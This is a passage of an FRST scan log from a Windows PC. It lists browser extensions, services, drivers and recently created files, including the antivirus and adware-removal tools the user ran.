    CHR Extension: (Google Wallet) - C:\Users\NorMac\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-02-28]
    CHR Extension: (Gmail) - C:\Users\NorMac\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-11-16]
    CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [2014-12-20]
    CHR HKLM-x32\...\Chrome\Extension: [idhngdhcfkoamngbedgpaokgjbnpdiji] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Chrome\Ext\realdownloader.crx [2013-08-14]
    CHR HKLM-x32\...\Chrome\Extension: [ilckobikkmajlmhhdenkhonjkoaneclk] - C:\Program Files (x86)\WinZip Courier\wzwmcgc.crx [2013-02-27]

    ==================== Services (Whitelisted) =================

    (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

    R2 !SASCORE; C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE [172344 2014-08-16] (SUPERAntiSpyware.com)
    R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [50344 2014-12-20] (AVAST Software)
    S3 AvastVBoxSvc; C:\Program Files\AVAST Software\Avast\ng\vbox\AvastVBoxSVC.exe [4012248 2014-12-20] (Avast Software)
    R2 HPSLPSVC; C:\Program Files (x86)\HP\Digital Imaging\bin\HPSLPSVC64.DLL [1039360 2011-08-18] (Hewlett-Packard Co.) [File not signed]
    S2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hp\Common\HPSupportSolutionsFrameworkService.exe [89352 2014-09-15] (Hewlett-Packard Company)
    S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe [289256 2014-04-09] (McAfee, Inc.)
    S2 Net Driver HPZ12; C:\Windows\System32\HPZinw12.dll [71680 2010-08-06] (Hewlett-Packard) [File not signed]
    R2 NETGEARGenieDaemon; C:\Program Files (x86)\NETGEAR Genie\bin\NETGEARGenieDaemon64.exe [232192 2013-11-14] (NETGEAR)
    S3 OpenVPNService; C:\Program Files (x86)\HMA! Pro VPN\bin\openvpnserv.exe [34528 2013-04-24] (The OpenVPN Project)
    S2 Pml Driver HPZ12; C:\Windows\System32\HPZipm12.dll [89600 2010-08-06] (Hewlett-Packard) [File not signed]
    R2 QBCFMonitorService; C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe [24576 2008-09-10] (Intuit) [File not signed]
    S3 QBFCService; C:\Program Files (x86)\Common Files\Intuit\QuickBooks\FCS\Intuit.QuickBooks.FCS.exe [61440 2008-08-08] (Intuit Inc.) [File not signed]
    R2 RealNetworks Downloader Resolver Service; C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe [39056 2013-08-14] ()
    R2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1738200 2014-04-25] (Safer-Networking Ltd.)
    R2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2081752 2014-04-25] (Safer-Networking Ltd.)
    R2 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2014-04-25] (Safer-Networking Ltd.)
    R2 Start8; C:\Program Files (x86)\Stardock\Start8\Start8Srv.exe [142960 2013-03-19] (Stardock Software, Inc)
    S2 WDBackup; C:\Program Files (x86)\Western Digital\WD SmartWare\WDBackupEngine.exe [1155088 2012-12-20] (Western Digital )
    R2 WDDMService; C:\Program Files\Western Digital\WD SmartWare\WD Drive Manager\WDDMService.exe [288768 2011-03-09] (WDC) [File not signed]
    R2 WDDriveService; C:\Program Files (x86)\Western Digital\WD Drive Manager\WDDriveService.exe [248840 2012-12-20] (Western Digital)
    R2 WDFME; C:\Program Files (x86)\Western Digital\WD SmartWare\Front Parlor\WDFME\WDFME.exe [1066896 2011-03-09] ()
    R2 WDRulesService; C:\Program Files (x86)\Western Digital\WD SmartWare\WDRulesEngine.exe [1178128 2012-12-20] (Western Digital )
    R2 WDSC; C:\Program Files (x86)\Western Digital\WD SmartWare\Front Parlor\WDSC.exe [491920 2011-03-09] ()
    S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [16032 2014-09-22] (Microsoft Corporation)

    ==================== Drivers (Whitelisted) ====================

    (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

    R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [29208 2014-12-20] ()
    R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [83280 2014-12-20] (AVAST Software)
    R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [93568 2014-12-20] (AVAST Software)
    R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [65776 2014-12-20] ()
    R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1050432 2014-12-20] (AVAST Software)
    R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [436624 2014-12-20] (AVAST Software)
    R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [116728 2014-12-20] (AVAST Software)
    R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [267632 2014-12-20] ()
    S3 dot4; C:\Windows\system32\DRIVERS\Dot4.sys [151968 2012-09-25] (Windows (R) Win 7 DDK provider)
    S3 Dot4Print; C:\Windows\System32\drivers\Dot4Prt.sys [27040 2012-09-25] (Windows (R) Win 7 DDK provider)
    S3 ICDUSB3; C:\Windows\System32\Drivers\ICDUSB3.sys [13312 2008-08-18] (Sony Corporation)
    R3 NPF; C:\Windows\System32\drivers\NPF.sys [35344 2014-02-11] (CACE Technologies, Inc.)
    R1 SASDIFSV; C:\Program Files\SUPERAntiSpyware\SASDIFSV64.SYS [14928 2011-07-22] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
    R2 VBoxAswDrv; C:\Program Files\AVAST Software\Avast\ng\vbox\VBoxAswDrv.sys [271752 2014-12-20] (Avast Software)
    S3 catchme; \??\C:\ComboFix\catchme.sys [X]
    S2 X5XSEx_Pr143; \??\C:\Program Files (x86)\Free Ride Games\X5XSEx_Pr143.Sys [X]

    ==================== NetSvcs (Whitelisted) ===================

    (If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


    ==================== One Month Created Files and Folders ========

    (If an entry is included in the fixlist, the file\folder will be moved.)

    2015-01-04 09:06 - 2015-01-04 09:06 - 01707939 _____ (Thisisu) C:\Users\NorMac\Downloads\JRT (2).exe
    2015-01-04 09:03 - 2015-01-04 09:05 - 00025082 _____ () C:\Users\NorMac\Downloads\FRST.txt
    2015-01-04 09:01 - 2015-01-04 09:01 - 02173952 _____ () C:\Users\NorMac\Downloads\AdwCleaner (1).exe
    2015-01-04 09:00 - 2015-01-04 09:03 - 00000000 ____D () C:\FRST
    2015-01-04 08:51 - 2015-01-04 08:52 - 02123776 _____ (Farbar) C:\Users\NorMac\Downloads\FRST64.exe
    2015-01-03 23:10 - 2015-01-03 23:10 - 00002790 _____ () C:\Users\NorMac\Desktop\cc_20150103_230953.reg
    2015-01-03 22:33 - 2015-01-03 22:33 - 00003234 _____ () C:\WINDOWS\System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-485173556-832918840-2370493585-1000
    2015-01-03 22:32 - 2015-01-03 22:32 - 00003366 _____ () C:\WINDOWS\System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-485173556-832918840-2370493585-1000
    2015-01-02 19:06 - 2015-01-02 19:06 - 00000000 ____D () C:\ProgramData\Sophos
    2015-01-02 19:04 - 2015-01-02 19:04 - 00002759 _____ () C:\Users\Public\Desktop\Sophos Virus Removal Tool.lnk
    2015-01-02 19:04 - 2015-01-02 19:04 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sophos
    2015-01-02 19:04 - 2015-01-02 19:04 - 00000000 ____D () C:\Program Files (x86)\Sophos
    2015-01-02 18:59 - 2015-01-02 18:47 - 107479960 _____ (Sophos Limited) C:\Users\NorMac\Desktop\Sophos Virus Removal Tool(1).exe
    2015-01-02 17:31 - 2015-01-02 17:40 - 01771732 _____ (Sophos Limited) C:\Users\NorMac\Downloads\Unconfirmed 257443.crdownload
    2015-01-02 12:53 - 2015-01-02 12:53 - 06824304 _____ (ParetoLogic, Inc.) C:\Users\NorMac\Downloads\Repair_Tool.exe
    2015-01-02 12:42 - 2015-01-02 12:42 - 00000794 _____ () C:\WINDOWS\setupact.log
    2015-01-02 12:42 - 2015-01-02 12:42 - 00000000 _____ () C:\WINDOWS\setuperr.log
    2015-01-02 09:03 - 2015-01-02 09:03 - 00000999 _____ () C:\Users\NorMac\Desktop\magicJack.lnk
    2015-01-01 22:21 - 2015-01-01 22:21 - 00050508 _____ () C:\Users\NorMac\Desktop\cc_20150101_222046.reg
    2015-01-01 21:44 - 2015-01-01 21:45 - 125705984 _____ (Microsoft Corporation) C:\Users\NorMac\Downloads\msert.exe
    2015-01-01 21:03 - 2015-01-01 21:03 - 00002774 _____ () C:\WINDOWS\System32\Tasks\CCleanerSkipUAC
    2015-01-01 21:03 - 2015-01-01 21:03 - 00000786 _____ () C:\Users\Public\Desktop\CCleaner.lnk
    2015-01-01 21:03 - 2015-01-01 21:03 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
    2015-01-01 21:03 - 2015-01-01 21:03 - 00000000 ____D () C:\Program Files\CCleaner
    2015-01-01 21:02 - 2015-01-01 21:02 - 05317104 _____ (Piriform Ltd) C:\Users\NorMac\Downloads\ccsetup501.exe
    2015-01-01 19:15 - 2015-01-01 19:30 - 00002278 _____ () C:\Users\NorMac\Desktop\Rkill.txt
    2014-12-31 22:19 - 2015-01-03 23:24 - 00451271 _____ () C:\WINDOWS\WindowsUpdate.log
    2014-12-31 22:17 - 2014-12-31 22:18 - 00511088 _____ () C:\WINDOWS\system32\FNTCACHE.DAT
    2014-12-31 19:57 - 2014-12-31 19:57 - 00149144 _____ () C:\Users\NorMac\AppData\Local\GDIPFONTCACHEV1.DAT
    2014-12-30 20:11 - 2014-12-30 20:11 - 00516603 _____ () C:\Users\NorMac\Downloads\2813_timeline_business_plan.zip
    2014-12-30 20:10 - 2014-12-30 20:11 - 00436139 _____ () C:\Users\NorMac\Downloads\2828-timeline-gantt-ppt.zip
    2014-12-30 20:10 - 2014-12-30 20:10 - 00216114 _____ () C:\Users\NorMac\Downloads\marketing-plan-timeline-template.zip
    2014-12-30 20:09 - 2014-12-30 20:10 - 00172321 _____ () C:\Users\NorMac\Downloads\partner-development-powerpoint-timeline(1).zip
    2014-12-30 20:09 - 2014-12-30 20:09 - 00188111 _____ () C:\Users\NorMac\Downloads\resume-timeline-career-path.zip
    2014-12-30 20:08 - 2014-12-30 20:09 - 00172321 _____ () C:\Users\NorMac\Downloads\partner-development-powerpoint-timeline.zip
    2014-12-30 20:07 - 2014-12-30 20:07 - 00138727 _____ () C:\Users\NorMac\Downloads\1028_schedule_ppt.zip
    2014-12-30 20:06 - 2014-12-30 20:06 - 00348531 _____ () C:\Users\NorMac\Downloads\980_post_it_ppt.zip
    2014-12-30 20:03 - 2014-12-30 20:03 - 00081088 _____ () C:\Users\NorMac\Downloads\51.zip
    2014-12-30 20:01 - 2014-12-30 20:01 - 00626823 _____ () C:\Users\NorMac\Downloads\188.zip
    2014-12-30 19:47 - 2014-12-30 19:47 - 00317699 _____ () C:\Users\NorMac\Downloads\1737_children_ppt.zip
    2014-12-30 19:47 - 2014-12-30 19:47 - 00242204 _____ () C:\Users\NorMac\Downloads\881_puppies walking blue_ppt.zip
    2014-12-30 19:47 - 2014-12-30 19:47 - 00191683 _____ () C:\Users\NorMac\Downloads\1992_turtle_ppt.zip
    2014-12-30 19:46 - 2014-12-30 19:46 - 00549822 _____ () C:\Users\NorMac\Downloads\1791_childhood_ppt.zip
    2014-12-30 19:44 - 2014-12-30 19:45 - 00296313 _____ () C:\Users\NorMac\Downloads\846_twitter_ppt.zip
    2014-12-30 19:42 - 2014-12-30 19:42 - 00316625 _____ () C:\Users\NorMac\Downloads\329_white_horse_ppt.zip
    2014-12-29 21:00 - 2014-12-29 21:00 - 13087456 _____ (Microsoft Corporation) C:\Users\NorMac\Downloads\Silverlight_x64 (2).exe
    2014-12-29 20:56 - 2014-12-29 20:56 - 00079991 _____ () C:\Users\NorMac\Downloads\silverlight.diagcab
    2014-12-28 22:43 - 2014-12-29 21:08 - 00003344 _____ () C:\WINDOWS\System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-485173556-832918840-2370493585-1000
    2014-12-28 22:43 - 2014-12-29 21:08 - 00003212 _____ () C:\WINDOWS\System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-485173556-832918840-2370493585-1000
    2014-12-28 19:39 - 2014-12-28 15:16 - 00000000 __SHD () C:\Jumpshot
    2014-12-28 19:37 - 2014-12-28 22:36 - 00000000 ____D () C:\WINDOWS\jumpshot.com
    2014-12-26 20:17 - 2014-12-26 20:44 - 00000247 _____ () C:\WINDOWS\system32\2014-12-27-01-17-00.093-aswFe.exe-1596.log
    2014-12-26 20:16 - 2014-12-26 20:16 - 00000197 _____ () C:\WINDOWS\system32\2014-12-27-01-16-49.018-AvastVBoxSVC.exe-11984.log
    2014-12-26 15:23 - 2014-12-26 15:37 - 00000247 _____ () C:\WINDOWS\system32\2014-12-26-20-23-30.049-aswFe.exe-13796.log
    2014-12-26 15:22 - 2014-12-26 15:22 - 00000197 _____ () C:\WINDOWS\system32\2014-12-26-20-22-43.029-AvastVBoxSVC.exe-6888.log
    2014-12-26 14:13 - 2014-12-26 14:22 - 00000247 _____ () C:\WINDOWS\system32\2014-12-26-19-13-36.033-aswFe.exe-14272.log
    2014-12-26 14:13 - 2014-12-26 14:13 - 00000197 _____ () C:\WINDOWS\system32\2014-12-26-19-13-29.055-AvastVBoxSVC.exe-4232.log
    2014-12-25 15:36 - 2014-12-25 15:37 - 00000197 _____ () C:\WINDOWS\system32\2014-12-25-20-36-08.072-AvastVBoxSVC.exe-3668.log
    2014-12-25 15:35 - 2014-11-26 16:11 - 00714184 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
    2014-12-25 15:35 - 2014-11-26 16:11 - 00106440 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
    2014-12-25 15:10 - 2014-12-25 15:19 - 00000000 ____D () C:\WINDOWS\system32\MRT
    2014-12-25 15:08 - 2014-10-08 23:00 - 01519104 _____ (Microsoft Corporation) C:\WINDOWS\system32\vssapi.dll
    2014-12-25 15:08 - 2014-10-08 23:00 - 01484288 _____ (Microsoft Corporation) C:\WINDOWS\system32\VSSVC.exe
    2014-12-25 15:08 - 2014-10-08 23:00 - 00069632 _____ (Microsoft Corporation) C:\WINDOWS\system32\vsstrace.dll
    2014-12-25 15:08 - 2014-10-08 22:59 - 01195520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vssapi.dll
    2014-12-25 15:08 - 2014-10-08 22:59 - 00052224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vsstrace.dll
    2014-12-25 12:06 - 2014-12-25 12:07 - 00000197 _____ () C:\WINDOWS\system32\2014-12-25-17-06-44.062-AvastVBoxSVC.exe-4776.log
    2014-12-24 18:51 - 2014-12-24 18:53 - 00000000 ____D () C:\Users\NorMac\AppData\Roaming\EPIM-Outlook Sync
    2014-12-24 18:50 - 2014-12-24 18:50 - 00000849 _____ () C:\Users\Public\Desktop\EPIM-Outlook Sync.lnk
    2014-12-24 18:50 - 2014-12-24 18:50 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EPIM-Outlook Sync
    2014-12-24 18:50 - 2014-12-24 18:50 - 00000000 ____D () C:\Program Files\EPIM-Outlook Sync
    2014-12-24 18:11 - 2014-12-24 18:11 - 00000000 ____D () C:\Users\NorMac\Documents\NorMac
    2014-12-24 17:34 - 2014-12-24 17:34 - 16227712 _____ () C:\Users\NorMac\Downloads\EssentialPIMPro6(1).exe
    2014-12-24 16:51 - 2014-12-24 16:53 - 00000197 _____ () C:\WINDOWS\system32\2014-12-24-21-51-58.024-AvastVBoxSVC.exe-3700.log
    2014-12-23 08:51 - 2014-12-23 08:51 - 00000197 _____ () C:\WINDOWS\system32\2014-12-23-13-51-00.058-AvastVBoxSVC.exe-4720.log
    2014-12-22 18:08 - 2014-12-22 18:10 - 00000197 _____ () C:\WINDOWS\system32\2014-12-22-23-08-39.021-AvastVBoxSVC.exe-3512.log
    2014-12-21 17:51 - 2014-12-21 17:51 - 00000247 _____ () C:\WINDOWS\system32\2014-12-21-22-51-14.079-aswFe.exe-5972.log
    2014-12-21 17:45 - 2014-12-21 17:50 - 00000247 _____ () C:\WINDOWS\system32\2014-12-21-22-45-52.048-aswFe.exe-9344.log
    2014-12-21 17:45 - 2014-12-21 17:45 - 00000197 _____ () C:\WINDOWS\system32\2014-12-21-22-45-50.034-AvastVBoxSVC.exe-8124.log
    2014-12-20 21:34 - 2014-12-20 21:35 - 00000247 _____ () C:\WINDOWS\system32\2014-12-21-02-34-57.092-aswFe.exe-5748.log
    2014-12-20 21:30 - 2014-12-20 21:34 - 00000247 _____ () C:\WINDOWS\system32\2014-12-21-02-30-36.025-aswFe.exe-5252.log
    2014-12-20 21:30 - 2014-12-20 21:30 - 00000197 _____ () C:\WINDOWS\system32\2014-12-21-02-30-32.062-AvastVBoxSVC.exe-4584.log
    2014-12-20 15:20 - 2014-12-20 15:23 - 00000000 ____D () C:\WINDOWS\SysWOW64\vbox
    2014-12-20 15:20 - 2014-12-20 15:23 - 00000000 ____D () C:\WINDOWS\system32\vbox
    2014-12-20 10:58 - 2014-12-20 10:58 - 00001928 _____ () C:\Users\Public\Desktop\Avast Free Antivirus.lnk
    2014-12-20 10:58 - 2014-12-20 10:57 - 00364512 _____ (AVAST Software) C:\WINDOWS\system32\aswBoot.exe
    2014-12-20 10:57 - 2014-12-20 10:57 - 00043152 _____ (AVAST Software) C:\WINDOWS\avastSS.scr
    2014-12-19 10:27 - 2014-12-30 18:26 - 00000000 ____D () C:\Users\NorMac\Downloads\NY Cooperative Loan Recognition Agreement_files
    2014-12-19 10:27 - 2014-12-19 10:27 - 00026190 _____ () C:\Users\NorMac\Downloads\NY Cooperative Loan Recognition Agreement.html
    2014-12-17 14:04 - 2014-12-17 14:04 - 02166272 _____ () C:\Users\NorMac\Downloads\adwcleaner_4.105.exe
    2014-12-16 22:49 - 2014-12-23 20:33 - 00065536 ____H () C:\Users\NorMac\Documents\~Outlook-12345.pst.tmp
    2014-12-16 22:34 - 2014-12-31 21:42 - 00000000 ____D () C:\Users\NorMac\AppData\Roaming\EssentialPIM Pro
    2014-12-16 22:34 - 2014-12-24 18:22 - 00001087 _____ () C:\Users\Public\Desktop\EssentialPIM Pro.lnk
    2014-12-16 22:34 - 2014-12-16 22:34 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EssentialPIM Pro
    2014-12-16 22:34 - 2014-12-16 22:34 - 00000000 ____D () C:\Program Files (x86)\EssentialPIM Pro
    2014-12-16 22:32 - 2014-12-16 22:32 - 16279040 _____ () C:\Users\NorMac\Downloads\EssentialPIMPro6.exe
    2014-12-16 21:10 - 2014-12-16 21:10 - 00012540 _____ () C:\Users\NorMac\Documents\cc_20141216_211001.reg
    2014-12-10 09:59 - 2014-12-10 09:59 - 00085862 _____ () C:\Users\NorMac\Documents\cc_20141210_095952.reg
    2014-12-10 09:39 - 2014-11-21 03:38 - 02237952 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
    2014-12-10 09:39 - 2014-11-21 03:38 - 00051712 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
    2014-12-10 09:39 - 2014-11-21 03:37 - 01409536 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
    2014-12-10 09:39 - 2014-11-21 03:37 - 00915968 _____ (Microsoft Corporation) C:\WINDOWS\system32\uxtheme.dll
    2014-12-10 09:39 - 2014-11-21 03:37 - 00053760 _____ (Microsoft Corporation) C:\WINDOWS\system32\UXInit.dll
    2014-12-10 09:39 - 2014-11-21 03:36 - 19283456 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
    2014-12-10 09:39 - 2014-11-21 03:36 - 15400960 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
    2014-12-10 09:39 - 2014-11-21 03:36 - 03959296 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
    2014-12-10 09:39 - 2014-11-21 03:36 - 02655232 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
    2014-12-10 09:39 - 2014-11-21 03:36 - 00855552 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
    2014-12-10 09:39 - 2014-11-21 03:36 - 00603136 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
    2014-12-10 09:39 - 2014-11-21 03:36 - 00451584 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtmsft.dll
    2014-12-10 09:39 - 2014-11-21 03:36 - 00281600 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
    2014-12-10 09:39 - 2014-11-21 03:36 - 00255488 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
    2014-12-10 09:39 - 2014-11-21 03:36 - 00197120 _____ (Microsoft Corporation) C:\WINDOWS\system32\msrating.dll
    2014-12-10 09:39 - 2014-11-21 03:36 - 00136704 _____ (Microsoft Corporation) C:\WINDOWS\system32\iesysprep.dll
    2014-12-10 09:39 - 2014-11-21 03:36 - 00097280 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
    2014-12-10 09:39 - 2014-11-21 03:36 - 00067072 _____ (Microsoft Corporation) C:\WINDOWS\system32\iesetup.dll
    2014-12-10 09:39 - 2014-11-21 03:36 - 00053760 _____ (Microsoft Corporation) C:\WINDOWS\system32\jsproxy.dll
    2014-12-10 09:39 - 2014-11-21 03:36 - 00039936 _____ (Microsoft Corporation) C:\WINDOWS\system32\iernonce.dll
    2014-12-10 09:39 - 2014-11-21 03:35 - 01509376 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
    2014-12-10 09:39 - 2014-11-21 02:17 - 01762816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
    2014-12-10 09:39 - 2014-11-21 02:17 - 01181696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
    2014-12-10 09:39 - 2014-11-21 02:17 - 00163840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrating.dll
    2014-12-10 09:39 - 2014-11-21 02:17 - 00080384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
    2014-12-10 09:39 - 2014-11-21 02:17 - 00044032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UXInit.dll
    2014-12-10 09:39 - 2014-11-21 02:16 - 13758976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
    2014-12-10 09:39 - 2014-11-21 02:16 - 02054656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
    2014-12-10 09:39 - 2014-11-21 02:16 - 01441280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
    2014-12-10 09:39 - 2014-11-21 02:16 - 00690688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
    2014-12-10 09:39 - 2014-11-21 02:16 - 00493056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
    2014-12-10 09:39 - 2014-11-21 02:16 - 00357888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtmsft.dll
    2014-12-10 09:39 - 2014-11-21 02:16 - 00226816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
    2014-12-10 09:39 - 2014-11-21 02:16 - 00226816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
    2014-12-10 09:39 - 2014-11-21 02:16 - 00109056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iesysprep.dll
    2014-12-10 09:39 - 2014-11-21 02:16 - 00061440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iesetup.dll
    2014-12-10 09:39 - 2014-11-21 02:16 - 00039936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jsproxy.dll
    2014-12-10 09:39 - 2014-11-21 02:16 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iernonce.dll
    2014-12-10 09:39 - 2014-11-21 02:00 - 02706432 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.tlb
    2014-12-10 09:39 - 2014-11-21 01:54 - 02706432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.tlb
    2014-12-10 09:39 - 2014-11-20 23:30 - 00534528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\uxtheme.dll
    2014-12-10 09:39 - 2014-10-11 02:44 - 19764736 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
    2014-12-10 09:39 - 2014-10-11 00:57 - 17562112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
    2014-12-10 09:39 - 2014-10-08 22:59 - 00623616 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsapi.dll
    2014-12-10 09:39 - 2014-10-08 22:59 - 00212992 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsrslvr.dll
    2014-12-10 09:39 - 2014-10-08 22:58 - 00458240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dnsapi.dll
    2014-12-10 09:39 - 2014-09-22 00:38 - 00673792 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmpeg2srcsnk.dll
    2014-12-10 09:39 - 2014-09-21 22:56 - 00513536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmpeg2srcsnk.dll
    2014-12-10 09:39 - 2014-09-17 18:24 - 00987136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\srmclient.dll
    2014-12-10 09:39 - 2014-09-17 18:24 - 00487936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\srmscan.dll
    2014-12-10 09:39 - 2014-09-17 18:24 - 00278528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\srm.dll
    2014-12-10 09:39 - 2014-09-17 18:24 - 00104448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\adrclient.dll
    2014-12-10 09:39 - 2014-09-17 17:57 - 01346560 _____ (Microsoft Corporation) C:\WINDOWS\system32\srmclient.dll
    2014-12-10 09:39 - 2014-09-17 17:57 - 00652800 _____ (Microsoft Corporation) C:\WINDOWS\system32\srmscan.dll
    2014-12-10 09:39 - 2014-09-17 17:57 - 00279040 _____ (Microsoft Corporation) C:\WINDOWS\system32\srm.dll
    2014-12-10 09:39 - 2014-09-17 17:57 - 00134144 _____ (Microsoft Corporation) C:\WINDOWS\system32\adrclient.dll
    2014-12-10 09:38 - 2014-11-21 02:17 - 14364672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
    2014-12-10 09:38 - 2014-11-21 02:16 - 02861568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
    2014-12-10 09:38 - 2014-11-06 01:50 - 01627648 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
    2014-12-10 09:38 - 2014-11-06 00:03 - 01339392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
    2014-12-08 22:56 - 2014-12-08 22:56 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
    2014-12-07 12:31 - 2014-12-17 14:10 - 00000000 ____D () C:\AdwCleaner
    2014-12-07 12:31 - 2014-12-07 12:31 - 00000055 _____ () C:\AdwCleanerDebug.txt
    2014-12-06 23:35 - 2014-12-06 23:54 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
    2014-12-06 23:30 - 2014-12-17 13:55 - 00096472 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
    2014-12-06 23:30 - 2014-12-17 13:55 - 00000000 ____D () C:\Users\NorMac\Desktop\mbar
    2014-12-06 23:29 - 2014-12-06 23:29 - 01944824 _____ (Bleeping Computer, LLC) C:\Users\NorMac\Downloads\rkill.exe
    2014-12-06 23:28 - 2014-12-06 23:29 - 01707646 _____ (Thisisu) C:\Users\NorMac\Downloads\JRT (1).exe
    2014-12-06 23:02 - 2014-12-06 23:02 - 00001069 _____ () C:\Users\NorMac\Documents\checkup.txt
    2014-12-06 09:56 - 2014-12-06 09:56 - 00002008 _____ () C:\Users\Public\Desktop\HP Print and Scan Doctor.lnk
    2014-12-06 09:34 - 2014-12-06 09:34 - 00003618 _____ () C:\WINDOWS\System32\Tasks\HPCustParticipation HP Officejet Pro 8610
    2014-12-06 09:33 - 2014-12-06 09:33 - 00002164 _____ () C:\Users\Public\Desktop\HP Officejet Pro 8610.lnk
    2014-12-06 09:33 - 2014-03-06 12:51 - 00763912 ____N (Hewlett-Packard Co.) C:\WINDOWS\system32\HPDiscoPM7112.dll

    ==================== One Month Modified Files and Folders =======

    (If an entry is included in the fixlist, the file\folder will be moved.)

